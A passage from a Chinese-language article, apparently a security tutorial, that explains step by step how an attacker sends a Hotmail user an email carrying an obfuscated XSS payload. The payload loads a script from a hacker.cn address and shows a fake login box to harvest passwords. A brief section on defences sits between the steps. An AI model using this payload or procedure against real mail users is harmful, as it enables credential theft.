跨站攻擊實例及避免方法

　　第二步：偽裝頁面做好了，接下來黑客就會制作跨站的Hotmail 電子郵件。一般黑客會選擇可以直接在郵件中編輯HTML代碼的軟件，例如DreamMail。啟動DreamMail后，新建一個支持POP3的電子信箱地址。

　　然后點擊DreamMail菜單欄“查看”中的“切換到豪華版本”選項，又用DreamMail新建一封HTML空白郵件，在郵件的內容頁面中點擊右鍵，選擇“編輯HTML源代碼”，在彈出的HTML源代碼編輯窗口中輸入以下XSS跨站代碼：

　　<font color="ffffff"> 
　　<div id="jmp" style="display:none">nop</div>
　　<div id="ly" style="display:none">function ok(){return true};window.onerror=ok</div>
　　<div id="tip" title="<a style="display:none">" style="display:none"></div>
　　<div id="tap" title="<" style="display:none"></div>
　　<div id="tep" title=">" style="display:none"></div>
　　<style>div{background-image:expression(javascript:1?document.write(EC_tip.title+';top:'+EC_tap.title+'/a'+EC_tep.title+EC_tap.title+'script id=nop'+EC_tep.title+EC_ly.innerHTML+EC_tap.title+'/script'+EC_tep.title+EC_tap.title+'script src=http://www.hacker.cn/test/index.asp?uid=miaodeyu@Hotmail.com'+EC_tep.title+EC_tap.title+'/script'+EC_tep.title):1=1);}</style></font>

　　在這段代碼中，黑客會根據自己偽裝網頁的地址和電子郵件更改“http://www.hacker.cn/test/index.asp?uid=miaodeyu@Hotmail.com” 鏈接地址。郵件編輯好之后點擊“確定”即可就完成了跨站郵件是制作。

圖2

　　跨站防范方案

　　要防范XSS跨站攻擊，普通用戶除了不要點擊陌生的來信和網絡鏈接外，最好關閉瀏覽器的 JavaScript 功能。此外，還可以將IE的安全級別設置為最高，這樣還可以防止Cookie被盜。網站管理者在制作網頁時，要注意過濾用戶輸入的特殊字符，這樣就可以避免大部分的XSS攻擊了。如果網絡管理者發現有針對自己網站的跨站攻擊，就要及時對被跨站的程序進行修補。

　　第三步：黑客會給自己的這封郵件起一個響亮誘人的名字，然后發送到受害者的MSN郵箱中，當受害者用Hotmail查看這封郵件后，會彈出Hotmail登錄框誘騙你輸入賬號和密碼登錄。受害者警惕性弱，就會在該惡意頁面中輸入賬號和密碼，這些信息沒有發送到微軟的服務器上，而是悄悄地發送到黑客那里了（圖2）。

文章來源于領測軟件測試網 http://www.kjueaiud.com/